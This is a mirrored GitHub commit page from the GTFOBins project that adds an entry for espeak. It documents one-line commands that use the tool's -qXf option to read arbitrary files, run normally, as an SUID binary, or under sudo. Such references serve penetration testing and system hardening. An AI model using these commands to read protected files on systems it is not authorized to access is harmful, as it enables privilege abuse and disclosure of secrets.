mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-26 12:13:13 +02:00
16
_gtfobins/espeak.md
Normal file
16
_gtfobins/espeak.md
Normal file
@@ -0,0 +1,16 @@
|
||||
---
|
||||
description: The file content appears in the middle of other textual information, thus it might not be suitable to read arbitray binary files.
|
||||
functions:
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
espeak -qXf "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./espeak -qXf "$LFILE"
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo espeak -qXf "$LFILE"
|
||||
---
|
Reference in New Issue
Block a user